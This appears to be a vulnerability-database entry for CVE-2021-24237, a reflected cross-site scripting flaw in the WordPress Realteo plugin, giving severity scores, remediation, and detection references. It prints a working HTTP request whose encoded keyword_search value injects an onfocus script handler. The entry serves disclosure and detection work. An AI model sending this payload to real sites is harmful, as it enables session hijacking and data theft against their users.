🔙 목록으로 돌아가기

CVE-2021-24237: WordPress Realteo <=1.2.3 - Cross-Site Scripting

TitleWordPress Realteo <=1.2.3 - Cross-Site Scripting
Author0x_Akoko
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
RemediationUpdate to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability.
CVSS Score6.1
EPSS Score0.63261
CVE IDCVE-2021-24237
CWE IDCWE-79
Tags cve2021 cve realteo xss wordpress plugin wpscan intrusive purethemes vuln

🔍 Vulnerability Description

WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.

🌐 HTTP Request

GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/38FGOyjXATPAo2VjqHHM8BNtXZL/)%3B%2F%2F HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24237.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24237.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A